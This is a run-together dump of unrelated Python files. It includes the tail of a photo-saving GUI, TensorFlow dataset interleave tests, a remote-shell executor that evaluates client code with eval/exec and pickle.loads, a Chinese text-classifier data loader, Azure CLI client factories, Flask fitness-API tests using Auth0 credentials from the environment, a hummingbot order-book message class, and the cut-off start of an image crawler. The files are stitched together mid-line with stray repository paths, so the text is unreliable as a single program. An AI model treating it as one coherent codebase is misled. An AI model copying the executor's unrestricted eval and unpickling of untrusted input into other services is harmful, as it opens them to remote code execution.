win.getMouse() # Do nothing if the click is not in the "Save file" button if not((p.getX() >= 1 and p.getX() <= 3) and \ (p.getY() >= 1.0 and p.getY() <= 2)): pass else: try: saveFileName = saveFileEntry.getText() # Files have a period before the file type if saveFileName == "" or not("." in saveFileName): # Reset p to keep the window open. p = Point(0, 0) message.setText("You have to enter a valid file name.") saveFileEntry.setText("") continue except (SyntaxError, NameError, TypeError, ValueError): message.setText("You have to enter a valid file name.") saveFileEntry.setText("") # You don't want the window closing inadvertently, so reset p. p = Point(0, 0) continue photo.save(saveFileName) win.close() def main(): # Get the input file from the user infileName = getPicture() # Display the file and convert the image to grayscale photo, win = showPhoto(infileName) # Open a new window to let the user save the photo savePhoto(photo) # Let the user admire the newly saved photo main()# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for the experimental input pipeline ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import threading from absl.testing import parameterized import numpy as np from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.framework import errors from tensorflow.python.framework import sparse_tensor from tensorflow.python.ops import array_ops from tensorflow.python.ops import script_ops from tensorflow.python.ops import sparse_ops from tensorflow.python.platform import test def _interleave(lists, cycle_length, block_length): """Reference implementation of interleave used for testing. Args: lists: a list of lists to interleave cycle_length: the length of the interleave cycle block_length: the length of the interleave block Yields: Elements of `lists` interleaved in the order determined by `cycle_length` and `block_length`. """ num_open = 0 # `all_iterators` acts as a queue of iterators over each element of `lists`. all_iterators = [iter(l) for l in lists] # `open_iterators` are the iterators whose elements are currently being # interleaved. open_iterators = [] for i in range(cycle_length): if all_iterators: open_iterators.append(all_iterators.pop(0)) num_open += 1 else: open_iterators.append(None) while num_open or all_iterators: for i in range(cycle_length): if open_iterators[i] is None: if all_iterators: open_iterators[i] = all_iterators.pop(0) num_open += 1 else: continue for _ in range(block_length): try: yield next(open_iterators[i]) except StopIteration: open_iterators[i] = None num_open -= 1 break def _make_coordinated_sloppy_dataset(input_values, cycle_length, block_length, num_parallel_calls): """Produces a dataset iterator and events to control the order of elements. Args: input_values: the values to generate lists to interleave from cycle_length: the length of the interleave cycle block_length: the length of the interleave block num_parallel_calls: the degree of interleave parallelism Returns: A dataset iterator (represented as `get_next` op) and events that can be used to control the order of output elements. """ # Set up threading events used to sequence when items are produced that # are subsequently interleaved. These events allow us to deterministically # simulate slowdowns and force sloppiness. coordination_events = {i: threading.Event() for i in input_values} def map_py_fn(x): coordination_events[x].wait() coordination_events[x].clear() return x * x def map_fn(x): return script_ops.py_func(map_py_fn, [x], x.dtype) def interleave_fn(x): dataset = dataset_ops.Dataset.from_tensors(x) dataset = dataset.repeat(x) return dataset.map(map_fn) options = dataset_ops.Options() options.experimental_deterministic = False dataset = dataset_ops.Dataset.from_tensor_slices(input_values).repeat( 2).interleave(interleave_fn, cycle_length, block_length, num_parallel_calls).with_options(options) iterator = dataset.make_one_shot_iterator() get_next = iterator.get_next() return get_next, coordination_events def _repeat(values, count): """Produces a list of lists suitable for testing interleave. Args: values: for each element `x` the result contains `[x] * x` count: determines how many times to repeat `[x] * x` in the result Returns: A list of lists of values suitable for testing interleave. """ return [[value] * value for value in np.tile(values, count)] class InterleaveDatasetTest(test_base.DatasetTestBase, parameterized.TestCase): @parameterized.named_parameters( ("1", [4, 5, 6], 1, 1, [ 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6 ]), ("2", [4, 5, 6], 2, 1, [ 4, 5, 4, 5, 4, 5, 4, 5, 5, 6, 6, 4, 6, 4, 6, 4, 6, 4, 6, 5, 6, 5, 6, 5, 6, 5, 6, 5, 6, 6 ]), ("3", [4, 5, 6], 2, 3, [ 4, 4, 4, 5, 5, 5, 4, 5, 5, 6, 6, 6, 4, 4, 4, 6, 6, 6, 4, 5, 5, 5, 6, 6, 6, 5, 5, 6, 6, 6 ]), ("4", [4, 5, 6], 7, 2, [ 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 5, 6, 6, 5, 6, 6 ]), ("5", [4, 0, 6], 2, 1, [4, 4, 6, 4, 6, 4, 6, 6, 4, 6, 4, 6, 4, 4, 6, 6, 6, 6, 6, 6]), ) def testPythonImplementation(self, input_values, cycle_length, block_length, expected_elements): input_lists = _repeat(input_values, 2) for expected, produced in zip( expected_elements, _interleave(input_lists, cycle_length, block_length)): self.assertEqual(expected, produced) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 1, 3, None), ("2", np.int64([4, 5, 6]), 1, 3, 1), ("3", np.int64([4, 5, 6]), 2, 1, None), ("4", np.int64([4, 5, 6]), 2, 1, 1), ("5", np.int64([4, 5, 6]), 2, 1, 2), ("6", np.int64([4, 5, 6]), 2, 3, None), ("7", np.int64([4, 5, 6]), 2, 3, 1), ("8", np.int64([4, 5, 6]), 2, 3, 2), ("9", np.int64([4, 5, 6]), 7, 2, None), ("10", np.int64([4, 5, 6]), 7, 2, 1), ("11", np.int64([4, 5, 6]), 7, 2, 3), ("12", np.int64([4, 5, 6]), 7, 2, 5), ("13", np.int64([4, 5, 6]), 7, 2, 7), ("14", np.int64([]), 2, 3, None), ("15", np.int64([0, 0, 0]), 2, 3, None), ("16", np.int64([4, 0, 6]), 2, 3, None), ("17", np.int64([4, 0, 6]), 2, 3, 1), ("18", np.int64([4, 0, 6]), 2, 3, 2), ) def testInterleaveDataset(self, input_values, cycle_length, block_length, num_parallel_calls): count = 2 dataset = dataset_ops.Dataset.from_tensor_slices(input_values).repeat( count).interleave( lambda x: dataset_ops.Dataset.from_tensors(x).repeat(x), cycle_length, block_length, num_parallel_calls) get_next = dataset.make_one_shot_iterator().get_next() with self.cached_session() as sess: for expected_element in _interleave( _repeat(input_values, count), cycle_length, block_length): self.assertEqual(expected_element, sess.run(get_next)) for _ in range(2): with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.float32([1., np.nan, 2., np.nan, 3.]), 1, 3, None), ("2", np.float32([1., np.nan, 2., np.nan, 3.]), 1, 3, 1), ("3", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 1, None), ("4", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 1, 1), ("5", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 1, 2), ("6", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, None), ("7", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, 1), ("8", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, 2), ("9", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, None), ("10", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 1), ("11", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 3), ("12", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 5), ("13", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 7), ) def testInterleaveDatasetError(self, input_values, cycle_length, block_length, num_parallel_calls): dataset = dataset_ops.Dataset.from_tensor_slices(input_values).map( lambda x: array_ops.check_numerics(x, "message")).interleave( dataset_ops.Dataset.from_tensors, cycle_length, block_length, num_parallel_calls) get_next = dataset.make_one_shot_iterator().get_next() with self.cached_session() as sess: for value in input_values: if np.isnan(value): with self.assertRaises(errors.InvalidArgumentError): sess.run(get_next) else: self.assertEqual(value, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) def testInterleaveSparse(self): def _map_fn(i): return sparse_tensor.SparseTensorValue( indices=[[0, 0], [1, 1]], values=(i * [1, -1]), dense_shape=[2, 2]) def _interleave_fn(x): return dataset_ops.Dataset.from_tensor_slices( sparse_ops.sparse_to_dense(x.indices, x.dense_shape, x.values)) iterator = ( dataset_ops.Dataset.range(10).map(_map_fn).interleave( _interleave_fn, cycle_length=1).make_one_shot_iterator()) get_next = iterator.get_next() with self.cached_session() as sess: for i in range(10): for j in range(2): expected = [i, 0] if j % 2 == 0 else [0, -i] self.assertAllEqual(expected, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 2, 1, 1), ("2", np.int64([4, 5, 6]), 2, 1, 2), ("3", np.int64([4, 5, 6]), 2, 3, 1), ("4", np.int64([4, 5, 6]), 2, 3, 2), ("5", np.int64([4, 5, 6]), 3, 2, 1), ("6", np.int64([4, 5, 6]), 3, 2, 2), ("7", np.int64([4, 5, 6]), 3, 2, 3), ("8", np.int64([4, 0, 6]), 2, 3, 1), ("9", np.int64([4, 0, 6]), 2, 3, 2), ) def testSloppyInterleaveInOrder(self, input_values, cycle_length, block_length, num_parallel_calls): get_next, coordination_events = _make_coordinated_sloppy_dataset( input_values, cycle_length, block_length, num_parallel_calls) config = config_pb2.ConfigProto( inter_op_parallelism_threads=num_parallel_calls + 1, use_per_session_threads=True) with self.cached_session(config=config) as sess: for expected_element in _interleave( _repeat(input_values, 2), cycle_length, block_length): coordination_events[expected_element].set() self.assertEqual(expected_element * expected_element, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 2, 1, 2), ("2", np.int64([4, 5, 6]), 2, 3, 2), ("3", np.int64([4, 5, 6]), 3, 2, 3), ("4", np.int64([4, 0, 6]), 2, 3, 2), ) def testSloppyInterleaveOutOfOrder(self, input_values, cycle_length, block_length, num_parallel_calls): get_next, coordination_events = _make_coordinated_sloppy_dataset( input_values, cycle_length, block_length, num_parallel_calls) config = config_pb2.ConfigProto( inter_op_parallelism_threads=num_parallel_calls + 1, use_per_session_threads=True) with self.cached_session(config=config) as sess: elements = [ x for x in _interleave( _repeat(input_values, 2), cycle_length, block_length) ] for i in [1, 4, 7]: elements[i], elements[i + 1] = elements[i + 1], elements[i] for element in elements: coordination_events[element].set() self.assertEqual(element * element, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) if __name__ == "__main__": test.main() ''' This module provides implementation for runtime executors. Public interfaces: Executor, RequireInput Usage: >>> s = ShellServer(5000) >>> e = s._executor # internal use only >>> e.prepare() >>> e.execute('print("hello, world!")').stdout() "hello, world!\n" >>> e.restore() ''' from typing import Optional, Any, AnyStr from types import BuiltinFunctionType, FunctionType from io import StringIO from config import default_config import pickle, sys, traceback __all__ = ['Executor', 'RequireInput'] config = default_config() HELPMSG = '\n'.join(config.get('shell.helpmsg')) def pack_data(data: Any) -> Any: 'Packs the data into serializable object.' if data is None or isinstance(data, (str, int, bytes, bytearray, RequireInput)): return data elif isinstance(data, (tuple, list)): r = [] for item in data: r.append(pack_data(item)) return r elif isinstance(data, dict): d = {} for k, v in data.items(): d[pack_data(k)] = pack_data(v) return d elif isinstance(data, BuiltinFunctionType) and data.__module__ == 'builtins': # only keep builtin function from 'builtins' module return data else: return RemoteObjectRef(data) def pack_error(error: Exception) -> Any: 'Packs a remote error traceback.' return RemoteException(error) def special_ref(obj: Any) -> Optional[str]: 'Gets a special reference name of the object.' if obj.__class__.__name__ in [ 'type', 'function', 'method', 'generator', 'async_generator', 'coroutine', 'getset_descriptor', 'method-wrapper', 'module', 'method_descriptor', 'wrapper_descriptor' ]: return obj.__name__ return None class RemoteException: 'Represents a remote exception.' def __init__(self, error: Exception): self._traceback = ''.join(traceback.format_exception(error.__class__, error, error.__traceback__)) def __getstate__(self): return { 'traceback': self._traceback } def __setstate__(self, state): self._traceback = state['traceback'] def printTraceback(self): 'Prints the traceback of the exception.' print(self._traceback.strip()) class RequireInput: 'Serializable object representing a request of input.' class RemoteObjectRef: 'Represents a reference of a remote object. Also serializable.' def __init__(self, obj: Any): self._class = obj.__class__.__name__ self._address = id(obj) self._name = special_ref(obj) def __repr__(self): if self._name is not None: return '' % (self._class, self._name) return '' % (self._class, '0x' + hex(self._address)[2:].upper()) def __getstate__(self): return { 'class': self._class, 'address': self._address, 'name': self._name } def __setstate__(self, state): self._class = state['class'] self._address = state['address'] self._name = state['name'] class ExecutionResult: 'Represents an execution result. This class is serializable.' def __init__(self, success: bool=True, data: Any=None, error: Optional[Exception]=None, stdout: str=''): if not success and not error: raise ValueError("error must be provided when failure.") self._success = success if error is not None: self._error = pack_error(error) else: self._error = None self._stdout = stdout self._data = data def pack(self) -> bytes: 'Packs this instance into bytes.' return pickle.dumps({ 'success': self._success, 'error': self._error, 'stdout': self._stdout, 'data': pack_data(self._data) }) @staticmethod def unpack(data: bytes) -> 'ExecutionResult': 'Unpacks an instance from provided binary data.' data = pickle.loads(data) result = ExecutionResult.__new__(ExecutionResult) result._success = data['success'] result._error = data['error'] result._stdout = data['stdout'] result._data = data['data'] return result def stdout(self) -> str: 'Gets the standard output of this result.' return self._stdout def success(self) -> bool: 'Whether this operation succeeded.' return self._success def error(self) -> Optional[RemoteException]: 'Gets the error of this result.' return self._error def data(self) -> Any: 'Gets the data of this result.' return self._data class RuntimeStdin: 'Runtime standard input file.' def __init__(self, server: 'server.ShellServer', stdout: 'RuntimeStdout'): self._buffer = '' self._server = server self._stdout = stdout def read(self, n: int) -> str: 'Reads specific amount of chars. Requests input if buffer is insufficient.' if len(self._buffer) < n: self._requireInput() data, self._buffer = self._buffer[:n], self._buffer[n:] return data def readline(self) -> str: 'Reads a line of chars. Requests input if buffer is insufficient.' if not self._buffer: self._requireInput() data, *buffer = self._buffer.split('\n', 1) self._buffer = buffer[0] if buffer else '' return data def _requireInput(self) -> None: 'Requests input from client.' self.put(self._server.requireInput(self._stdout.get())) def put(self, data: str) -> None: 'Put characters into buffer.' self._buffer += data def noop(self) -> None: 'No operation needed.' flush = close = noop class RuntimeStdout: 'Runtime standard output file.' def __init__(self): self._buffer = '' def write(self, data: str) -> None: 'Writes data to buffer.' self._buffer += data def get(self) -> str: 'Gets the data written to the buffer.' data, self._buffer = self._buffer, '' return data def noop(self) -> None: 'No operation needed.' flush = close = noop class Executor: 'Represents the code executor of the server.' def __init__(self, server: 'server.ShellServer'): self._scope = {} self._stdout = RuntimeStdout() self._stdin = RuntimeStdin(server, self._stdout) self._server = server def prepare(self) -> None: 'Prepare to execute. Redirects stdin and stdout.' sys.stdin = self._stdin sys.stdout = self._stdout def restore(self) -> None: 'Restore sys.stdin and sys.stdout.' sys.stdin = sys.__stdin__ sys.stdout = sys.__stdout__ def execute(self, statement: AnyStr) -> ExecutionResult: 'Execute the code using eval and exec. Returns an execution result.' if isinstance(statement, bytes): statement = statement.decode() if statement.startswith('#:'): # meta command: return self.metacommand(statement[2:]) try: return ExecutionResult(True, eval(statement, self._scope), None, self._stdout.get()) except SyntaxError: pass except Exception as e: return ExecutionResult(False, None, e, self._stdout.get()) try: exec(statement, self._scope) return ExecutionResult(True, None, None, self._stdout.get()) except Exception as e: return ExecutionResult(False, None, e, self._stdout.get()) def metacommand(self, cmd: AnyStr) -> ExecutionResult: 'Execute a metacommand.' cmd = cmd.strip().lower() if isinstance(cmd, bytes): cmd = cmd.decode() if cmd == 'mode.encrypt': self._server.switchMode('encrypt') return ExecutionResult(True) elif cmd == 'mode.signature': self._server.switchMode('signature') return ExecutionResult(True, None, None, "Warning: Swiching to insecure context.\n") elif cmd == 'mode': return ExecutionResult(True, None, None, self._server._mode+"\n") elif cmd == 'help': return ExecutionResult(True, None, None, HELPMSG) elif cmd == 'exit': self._server.abort() # no return return ExecutionResult(True, None, None, "No metacommand named %s\n" % cmd)# coding:utf-8 import numpy as np import re import itertools from collections import Counter import sys # import importlib # importlib.reload(sys) # reload(sys) # sys.setdefaultencoding("utf-8") # 剔除英文的符号 def clean_str(string): string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() def load_data_and_labels(jisuanji_data_file, jiaotong_data_file): """ 加载二分类训练数据,为数据打上标签 (X,[0,0]) X = 【 日 期 】19960104 【 版 号 】1 【 标 题 】合巢芜高速公路巢芜段竣工 【 作 者 】彭建中 【 正 文 】 安徽合(肥)巢(湖)芜(湖)高速公路巢芜段日前竣工通车并投入营运。合巢芜 高速公路是国家规划的京福综合运输网的重要干线路段,是交通部确定1995年建成 的全国10条重点公路之一。该条高速公路正线长88公里。(彭建中) Y = 交通 0:交通---> [1,0] 1:计算机--->[0,1] (X,Y) """ jisuanji_examples = list(open(jisuanji_data_file, "r", encoding="utf-8").readlines()) jisuanji_examples = [s.strip() for s in jisuanji_examples] jiaotong_exampless = list(open(jiaotong_data_file, "r", encoding="utf-8").readlines()) jiaotong_exampless = [s.strip() for s in jiaotong_exampless] x_text = jisuanji_examples + jiaotong_exampless # 适用于英文 # x_text = [clean_str(sent) for sent in x_text] x_text = [sent for sent in x_text] # 定义类别标签 ,格式为one-hot的形式: y=1--->[0,1] positive_labels = [[0, 1] for _ in jisuanji_examples] # print positive_labels[1:3] negative_labels = [[1, 0] for _ in jiaotong_exampless] y = np.concatenate([positive_labels, negative_labels], 0) """ print y [[0 1] [0 1] [0 1] ..., [1 0] [1 0] [1 0]] print y.shape (10662, 2) """ return [x_text, y] def batch_iter(data, batch_size, num_epochs, shuffle=True): """ 利用迭代器从训练数据会取某一个batch的数据 """ data = np.array(data) data_size = len(data) num_batches_per_epoch = int((len(data)-1)/batch_size) + 1 for epoch in range(num_epochs): # 每回合打乱顺序 if shuffle: # 随机产生以一个乱序数组,作为数据集数组的下标 shuffle_indices = np.random.permutation(np.arange(data_size)) shuffled_data = data[shuffle_indices] else: shuffled_data = data # 划分批次 for batch_num in range(num_batches_per_epoch): start_index = batch_num * batch_size end_index = min((batch_num + 1) * batch_size, data_size) yield shuffled_data[start_index:end_index] # 测试代码用的 if __name__ == '__main__': jisuanji_data_file = './fenci/jisuanji200.txt' jiaotong_data_file = './fenci/jiaotong214.txt' load_data_and_labels(jisuanji_data_file, jiaotong_data_file) src/peering/azext_peering/generated/_client_factory.py100-1000 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- def cf_peering_base(cli_ctx, *_): from azure.cli.core.commands.client_factory import get_mgmt_service_client from ..vendored_sdks.peering import PeeringManagementClient return get_mgmt_service_client(cli_ctx, PeeringManagementClient) def cf_legacy_peering(cli_ctx, *_): return cf_peering_base(cli_ctx).legacy_peering def cf_peer_asn(cli_ctx, *_): return cf_peering_base(cli_ctx).peer_asn def cf_peering_location(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_location def cf_registered_asn(cli_ctx, *_): return cf_peering_base(cli_ctx).registered_asn def cf_registered_prefix(cli_ctx, *_): return cf_peering_base(cli_ctx).registered_prefix def cf_peering(cli_ctx, *_): return cf_peering_base(cli_ctx).peering def cf_received_route(cli_ctx, *_): return cf_peering_base(cli_ctx).received_route def cf_peering_service_country(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_country def cf_peering_service_location(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_location def cf_prefix(cli_ctx, *_): return cf_peering_base(cli_ctx).prefix def cf_peering_service_provider(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_provider def cf_peering_service(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service 0 import os from datetime import datetime import unittest import json from flask_sqlalchemy import SQLAlchemy from main import app from main import db import http.client API_PREFIX = "/api/v1" CLIENT_SECRET = os.environ['CLIENT_SECRET'] CLIENT_ID = os.environ['CLIENT_ID'] class FitAppTestSuite(unittest.TestCase): @classmethod def setUpClass(cls): # Setup Authentication. Only need to execute once conn = http.client.HTTPSConnection("as12production.auth0.com") payload = { "client_id": CLIENT_ID, "client_secret": CLIENT_SECRET, "audience": "Fit-API", "grant_type": "client_credentials" } headers = {'content-type': "application/json"} conn.request("POST", "/oauth/token", json.dumps(payload), headers) res = conn.getresponse() data = res.read() cls.subject = f"{CLIENT_ID}@clients" cls.token = json.loads(data.decode("utf-8"))['access_token'] def setUp(self): """Define test variables and initialize app.""" self.app = app db.drop_all() db.create_all() self.client = self.app.test_client # binds the app to the current context with self.app.app_context(): self.db = SQLAlchemy() def tearDown(self): """Executed after reach test""" pass """ Global Endpoints """ def test_invalid_url(self): response = self.client().get('/invalid', follow_redirects=True) self.assertEqual(response.status_code, 404) def test_health_endpoint(self): response = self.client().get(f'{API_PREFIX}/health', follow_redirects=True) self.assertEqual(response.status_code, 200) """ User Endpoints """ """ GET /users """ def test_get_user(self): response = self.client().get(f'{API_PREFIX}/users', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) def test_get_user_no_auth(self): response = self.client().get(f'{API_PREFIX}/users', follow_redirects=True) self.assertEqual(response.status_code, 401) """ POST & DELETE /users """ def test_post_user_invalid_weight(self): data = { "target_weight": -20, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) def test_post_user_bad_weight(self): data = { "target_weight": 0, "height": -20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) def test_post_user_no_auth(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, follow_redirects=True) self.assertEqual(response.status_code, 401) def test_post_and_delete_user(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) # Cannot post same user twice response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) response = self.client().get(f'{API_PREFIX}/users', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) self.assertEqual(json.loads(response.data)['count'], 1) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 404) """ PATCH /users """ def test_patch_user(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) data = { "target_weight": -10, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) data = { "target_weight": 10, "height": -20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) def test_patch_no_user(self): data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 404) def test_patch_different_user(self): data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/1234', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 403) """ GET /progress """ def test_get_all_progress(self): response = self.client() \ .get(f'{API_PREFIX}/progress', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) response = self.client().get(f'{API_PREFIX}/progress', follow_redirects=True) self.assertEqual(response.status_code, 401) """ GET /progress/{id} """ def test_get_progress(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) response = self.client() \ .get(f'{API_PREFIX}/progress/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) response = self.client() \ .get(f'{API_PREFIX}/progress/1234', follow_redirects=True, headers={ "Authorization": f"Bearer {self.token}"}) self.assertEqual(response.status_code, 403) response = self.client() \ .get(f'{API_PREFIX}/progress/{self.subject}', follow_redirects=True) self.assertEqual(response.status_code, 401) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) """ POST/PATCH /progress/{id} """ def test_post_patch_progress(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data = { "track_date": datetime.today().date().strftime('%Y-%m-%d'), "weight": 255, "mood": "neutral", "diet": "neutral" } response = self.client() \ .post(f'{API_PREFIX}/progress/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data["weight"] = 500 response = self.client() \ .patch(f'{API_PREFIX}/progress/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) response = self.client() \ .post(f'{API_PREFIX}/progress/1234', follow_redirects=True, headers={ "Authorization": f"Bearer {self.token}"}) self.assertEqual(response.status_code, 403) response = self.client() \ .patch(f'{API_PREFIX}/progress/{self.subject}', follow_redirects=True) self.assertEqual(response.status_code, 401) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) # Make the tests conveniently executable if __name__ == "__main__": unittest.main() BGTCapital/hummingbothummingbot/connector/exchange/beaxy/beaxy_order_book_message.py import time from typing import Dict, List, Optional from hummingbot.core.data_type.order_book_row import OrderBookRow from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType class BeaxyOrderBookMessage(OrderBookMessage): def __new__( cls, message_type: OrderBookMessageType, content: Dict[str, any], timestamp: Optional[float] = None, *args, **kwargs, ): if timestamp is None: if message_type is OrderBookMessageType.SNAPSHOT: raise ValueError('timestamp must not be None when initializing snapshot messages.') timestamp = int(time.time()) return super(BeaxyOrderBookMessage, cls).__new__( cls, message_type, content, timestamp=timestamp, *args, **kwargs ) @property def update_id(self) -> int: return int(str(self.content['sequenceNumber'])) @property def trade_id(self) -> int: return int(self.timestamp * 1e3) def _entries(self, side): return [ OrderBookRow(entry['price'], entry['quantity'], self.update_id) if entry['action'] != 'DELETE' else OrderBookRow(entry['price'], 0, self.update_id) for entry in self.content.get('entries', []) if entry['side'] == side ] @property def asks(self) -> List[OrderBookRow]: return self._entries('ASK') @property def bids(self) -> List[OrderBookRow]: return self._entries('BID') @property def has_update_id(self) -> bool: return True @property def has_trade_id(self) -> bool: return True def __eq__(self, other) -> bool: return self.type == other.type and self.timestamp == other.timestamp def __lt__(self, other) -> bool: if self.timestamp != other.timestamp: return self.timestamp < other.timestamp else: """ If timestamp is the same, the ordering is snapshot < diff < trade """ return self.type.value < other.type.value kittenparry/old-stuffpython/16-04-17 girlsreleased crawler.py import time from bs4 import BeautifulSoup import urllib.request import dryscrape import os def sign(): print('######################################') print('######################################') print('### girlsreleased img downloader ###') print('### ###') print('### ###') print('### ###') print('######################################') print('######################################') agent = {'User-Agent': 'Mozilla/5.0'} def replay(): rp = input('#again? (y/n)') rp2 = rp.lower() if rp2 == 'y': crawl() elif rp2 == 'n': print('#shutting down') else: print('#type y or n') replay() def crawl(mp = 1): galurl = input('#gallery url:') print('#checking the url') strippedurl = galurl.strip() splitgurl = strippedurl.split('.com', 1) first = splitgurl[0] if first == 'https://girlsreleased': second = splitgurl[1].split('=', 1)[0] if second == '/?setid': print('#done') else: print('#not a gallery link eg. /?setid=...') replay() return None else: print('#not a girlsreleased page') replay() return None page = 1 foldername = 